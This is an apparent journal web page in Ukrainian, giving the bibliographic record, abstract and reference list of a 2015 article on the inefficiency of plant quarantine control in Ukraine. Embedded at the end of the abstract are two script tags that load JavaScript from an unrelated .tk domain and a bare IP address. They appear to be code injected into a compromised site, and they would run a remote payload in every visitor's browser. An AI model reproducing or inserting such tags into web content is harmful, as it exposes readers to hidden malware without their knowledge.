ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 33.025.12:632.913.1(477)
Економіка агропромислового виробництва

Система регулювання фітосанітарних заходів в Україні / Дем’яненко С.І., Нів’євський О. В. // Економіка АПК. - 2015. - № 5 - С. 28

Розглянуто систему регулювання фітосанітарних заходів (карантину рослин) в Україні та її ефективність. Проаналізовано причини низької ефективності вітчизняного карантинного контролю рослин і встановлено, що основними з них є: дезінтеграція внутрішнього ринку продукції рослинництва; існування тотального контролю над торговельними й особливо над експортними потоками продукції, а не над поширенням шкідливих організмів; існуючий високий ризик корупції та зловживань; перешкоди експорту й виходу української агропродовольчої продукції на зовнішні ринки; значне нівелювання державної підтримки аграрного сектору внаслідок завищених витрат виробників, пов’язаних з неефективністю карантинного контролю рослин, що фактично зменшує інвестиції в галузь та обмежує її зростання. Запропоновано напрями вдосконалення карантинного контролю рослин, зокрема, перегляд і суттєве скорочення списку об’єктів регулювання, перегляд термінів, порядку оформлення й видачі карантинного (фітосанітарного) сертифіката, наближення гармонізації законодавства України в сфері карантину та захисту рослин із законодавством ЄС. Бібліогр.: 14.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: регулювання, фітосанітарні заходи, ефективність карантинного контролю, ринки продукції рослинництва, торговельні потоки, експорт, фітосанітарний сертифікат, законодавство

Список використаних джерел

 1. Бондар Л.О. Екологічне право України у запитаннях та відповідях: навч. посіб. / Л.О. Бондар, В.В. Курзова. – Х. : Ксілон, 2007. – 246 с.
 2. Макаренко В. Карантин без ліцензій / В. Макаренко // Агроперспектива – 2005. – № 3. – С. 14-16.
 3. Курзова В.В. Еколого-правове регулювання карантину рослин: автореф. дис. … юрид. наук / В.В. Курзова. – К. : 2009. – 22 с.
 4. Ньюбуре Девід. Підготовка до змін у галузі насінництва. Виробництво продуктів харчування. Аналіз промисловості та ринку / Девід Ньюбуре. – К.: Проект паювання сільськогосподарських земель, Агентство США з міжнародного розвитку, вип. 9, верес., 1998.
 5. Штефан фон Крамон-Таубадель. Наслідки вступу до СОТ для аграрної політики України. Сільське господарство України: криза та відновлення / Штефан фон Крамон-Таубадель, С. Зоря; за ред. Штефана фон Крамона-Таубаделя, Сергія Дем’яненка та Арніма Куна. – К.: КНЕУ. – С. 5-15.
 6. Осмокєску Є. Карантин рослин в Україні – потрібен контроль над шкідливими організмами, а не над торговельними потоками / Є. Осмокєску, О. Нів’євський. – Проект IFC «Інвестиційний клімат в аграрному секторі України», Група Світового банку http://www.ifc.org/ukraine/ic.
 7. Food Safety and Agricultural Health Standards. Challenges and Opportunities for Developing Country Export. – Poverty Redaction and Economic Management Trade Unit, and Agriculture and Rural Development Department, World Bank, report No. 31207, January 10, 2005.
 8. Ebbels, D. Principles of plant health and quarantine. CABI Publishing, Wallingford, 2003.
 9. Vapnek, J. and D. Manzella. Guidelines for the Revision of National Phytosanitary Legislation. FAO Legal Papers Online #63, 2007.
 10. Food Chain Evaluation Consortium. Evaluation of the Community Plant Health Regime . Final Report. European Commission DG SANCO http://ec.europa.eu/food/plant/strategy/docs/final_report_eval_en.pdf, 2010.
 11. Bossche, P.L.H. van den. The Law and Policy of the World Trade Organization. Text, Cases and Materials (2nd ed.). Cambridge: Cambridge University Press. (917 p.), 2008.
 12. Strange, R. N., & Scott, P. R. Plant disease: a threat to global food security. Annual review of phytopathology, 43(Figure 1), 83–116. doi:10.1146/annurev.phyto.43.113004.133839, 2005.
 13. Міжнародна фінансова корпорація [Електронний ресурс]: http://www.ifc.org/wps/wcm/connect/RegProjects_Ext _Content / IFC_External_Corporate_Site/USPP_Home.
 14. Державна ветеринарна та фітосанітарна служба України [Електронний ресурс]. – Режим доступу: http://vet.gov.ua/.
Читати статтю: 15_05_28-33.pdf